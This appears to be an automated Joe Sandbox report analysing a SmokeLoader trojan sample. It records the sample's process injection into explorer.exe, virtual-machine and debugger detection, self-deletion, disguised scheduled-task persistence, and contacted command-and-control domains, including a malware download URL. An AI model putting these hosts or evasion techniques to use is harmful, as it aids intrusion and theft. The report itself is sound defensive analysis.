            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
            Source: C:\Users\user\AppData\Roaming\gahfeajProcess created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Users\user\AppData\Local\Temp\D380.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe" Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajProcess created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeajJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D380.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exeJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gahfeajJump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D380.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/3@10/1
            Source: qhQ6armJ25.exeStatic PE information: More than 200 imports for KERNEL32.dll
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: xd?#C:\kotofaru\tenexut.pdbP+C source: qhQ6armJ25.exe, gahfeaj.2.dr
            Source: Binary string: C:\loc vetudigalol\6_di.pdbP+C source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
            Source: Binary string: C:\loc vetudigalol\6_di.pdb source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
            Source: Binary string: C:\kotofaru\tenexut.pdb source: qhQ6armJ25.exe, gahfeaj.2.dr
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_004025F7 pushad ; iretd 1_2_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_004029A6 push eax; ret 1_2_004029AE
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_1_004025F7 pushad ; iretd 1_1_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_1_004029A6 push eax; ret 1_1_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01D23146 push eax; ret 4_2_01D2314E
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01D22D97 pushad ; iretd 4_2_01D22D9A
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01F24733 push ebp; ret 4_2_01F24734
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01F1FB3B pushad ; iretd 4_2_01F1FB4B
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01F24210 push edi; ret 4_2_01F24239
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_004025F7 pushad ; iretd 5_2_004025FA
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_004029A6 push eax; ret 5_2_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 6_2_004025F7 pushad ; iretd 6_2_004025FA
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 6_2_004029A6 push eax; ret 6_2_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 6_1_004025F7 pushad ; iretd 6_1_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_00420500 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00420500
            Source: initial sampleStatic PE information: section name: .text entropy: 7.04028491917
            Source: initial sampleStatic PE information: section name: .text entropy: 7.02591971436
            Source: initial sampleStatic PE information: section name: .text entropy: 7.04028491917
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gahfeajJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D380.exeJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gahfeajJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Deletes itself after installationShow sources
            Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\qhq6armj25.exeJump to behavior
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\gahfeaj:Zone.Identifier read attributes | deleteJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: qhQ6armJ25.exe, 00000001.00000002.765854041.0000000001F40000.00000004.00000001.sdmpBinary or memory string: ASWHOOK
            Checks if the current machine is a virtual machine (disk enumeration)Show sources
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\explorer.exe TID: 2936Thread sleep count: 615 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1316Thread sleep count: 385 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1316Thread sleep time: -38500s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3080Thread sleep count: 462 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3080Thread sleep time: -46200s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6360Thread sleep count: 439 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 660Thread sleep count: 281 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 6364Thread sleep count: 282 > 30Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 615Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 385Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 462Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 439Jump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeSystem information queried: ModuleInformationJump to behavior
            Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAY
            Source: explorer.exe, 00000002.00000000.749875732.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
            Source: explorer.exe, 00000002.00000000.732593679.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

            Anti Debugging:

            barindex
            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004202D0
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_00420500 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00420500
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01D20042 push dword ptr fs:[00000030h]4_2_01D20042
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01F1D6AA push dword ptr fs:[00000030h]4_2_01F1D6AA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 6_1_00402679 LdrLoadDll,6_1_00402679
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004202D0
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_0041E390 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041E390
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_0041FDD0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041FDD0
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_0041DE90 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041DE90

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\explorer.exeFile created: gahfeaj.2.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: nalirou70.top
            Source: C:\Windows\explorer.exeDomain query: privacytoolzfor-you7000.top
            Source: C:\Windows\explorer.exeDomain query: xacokuo80.top
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\AppData\Local\Temp\D380.exeMemory written: C:\Users\user\AppData\Local\Temp\D380.exe base: 400000 value starts with: 4D5AJump to behavior
            Contains functionality to inject code into remote processesShow sources
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,4_2_01D20110
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeThread created: C:\Windows\explorer.exe EIP: 4F01920Jump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajThread created: unknown EIP: 3151920Jump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajProcess created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeajJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D380.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exeJump to behavior
            Source: explorer.exe, 00000002.00000000.712673606.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.731425992.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.745782073.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.749862534.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000002.00000000.738660675.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.759191918.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_00418430 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00418430

            Stealing of Sensitive Information:

            barindex
            Yara detected SmokeLoaderShow sources
            Source: Yara matchFile source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected SmokeLoaderShow sources
            Source: Yara matchFile source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsNative API1DLL Side-Loading1Process Injection512Masquerading11Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion12LSASS MemorySecurity Software Discovery321Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerVirtualization/Sandbox Evasion12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol124Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Hidden Files and Directories1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 528745 Sample: qhQ6armJ25.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 41 Multi AV Scanner detection for domain / URL 2->41 43 Found malware configuration 2->43 45 Antivirus detection for URL or domain 2->45 47 5 other signatures 2->47 9 qhQ6armJ25.exe 2->9         started        11 gahfeaj 2->11         started        process3 signatures4 14 qhQ6armJ25.exe 9->14         started        63 Machine Learning detection for dropped file 11->63 17 gahfeaj 11->17         started        process5 signatures6 65 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 14->65 67 Maps a DLL or memory area into another process 14->67 69 Checks if the current machine is a virtual machine (disk enumeration) 14->69 19 explorer.exe 4 14->19 injected 71 Creates a thread in another existing process (thread injection) 17->71 process7 dnsIp8 35 xacokuo80.top 212.192.241.249, 49714, 49715, 49716 RAPMSB-ASRU Russian Federation 19->35 37 privacytoolzfor-you7000.top 19->37 39 nalirou70.top 19->39 29 C:\Users\user\AppData\Roaming\gahfeaj, PE32 19->29 dropped 31 C:\Users\user\AppData\Local\Temp\D380.exe, PE32 19->31 dropped 33 C:\Users\user\...\gahfeaj:Zone.Identifier, ASCII 19->33 dropped 49 System process connects to network (likely due to code injection or exploit) 19->49 51 Benign windows process drops PE files 19->51 53 Deletes itself after installation 19->53 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->55 24 D380.exe 19->24         started        file9 signatures10 process11 signatures12 57 Machine Learning detection for dropped file 24->57 59 Contains functionality to inject code into remote processes 24->59 61 Injects a PE file into a foreign processes 24->61 27 D380.exe 24->27         started        process13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            qhQ6armJ25.exe45%VirustotalBrowse
            qhQ6armJ25.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\gahfeaj100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\D380.exe100%Joe Sandbox ML

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.1.gahfeaj.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.2.gahfeaj.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.qhQ6armJ25.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.1.D380.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.0.gahfeaj.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            4.2.D380.exe.1d215a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.2.D380.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.0.D380.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.0.D380.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.1.qhQ6armJ25.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.0.D380.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.2.qhQ6armJ25.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.qhQ6armJ25.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            3.2.gahfeaj.1d715a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.0.gahfeaj.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.qhQ6armJ25.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.0.gahfeaj.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.2.qhQ6armJ25.exe.1d715a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            privacytoolzfor-you7000.top6%VirustotalBrowse
            xacokuo80.top8%VirustotalBrowse
            nalirou70.top11%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://xacokuo80.top/8%VirustotalBrowse
            http://xacokuo80.top/0%Avira URL Cloudsafe
            http://nalirou70.top/100%Avira URL Cloudphishing
            http://privacytoolzfor-you7000.top/downloads/toolspab2.exe100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            privacytoolzfor-you7000.top
            212.192.241.249
            truetrueunknown
            xacokuo80.top
            212.192.241.249
            truetrueunknown
            nalirou70.top
            unknown
            unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://xacokuo80.top/true
            • 8%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://nalirou70.top/true
            • Avira URL Cloud: phishing
            unknown
            http://privacytoolzfor-you7000.top/downloads/toolspab2.exetrue
            • Avira URL Cloud: malware
            unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            212.192.241.249
            privacytoolzfor-you7000.topRussian Federation
            61269RAPMSB-ASRUtrue

            General Information

            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:528745
            Start date:25.11.2021
            Start time:18:22:55
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 7m 24s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:qhQ6armJ25.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:6
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@10/3@10/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 74.3% (good quality ratio 59.9%)
            • Quality average: 52.2%
            • Quality standard deviation: 35.3%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            Show All
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            18:24:50Task SchedulerRun new task: Firefox Default Browser Agent 944D867DB154EF14 path: C:\Users\user\AppData\Roaming\gahfeaj

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            212.192.241.249ttY1E1yC3m.exeGet hashmaliciousBrowse
            • file-file-host4.com/tratata.php
            EUMeloHpr7.exeGet hashmaliciousBrowse
            • file-file-host4.com/tratata.php
            yH8giB6jJ2.exeGet hashmaliciousBrowse
            • xacokuo80.top/

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            privacytoolzfor-you7000.topyH8giB6jJ2.exeGet hashmaliciousBrowse
            • 212.192.241.249
            AO7gki3UTr.exeGet hashmaliciousBrowse
            • 47.254.176.217
            J73PTzDghy.exeGet hashmaliciousBrowse
            • 212.193.50.242
            Fm9bT1UlKI.exeGet hashmaliciousBrowse
            • 8.209.115.161
            LaicMpixgy.exeGet hashmaliciousBrowse
            • 8.209.115.161
            daleUmOAcZ.exeGet hashmaliciousBrowse
            • 8.209.115.161
            lAx2rypDqG.exeGet hashmaliciousBrowse
            • 8.209.115.161
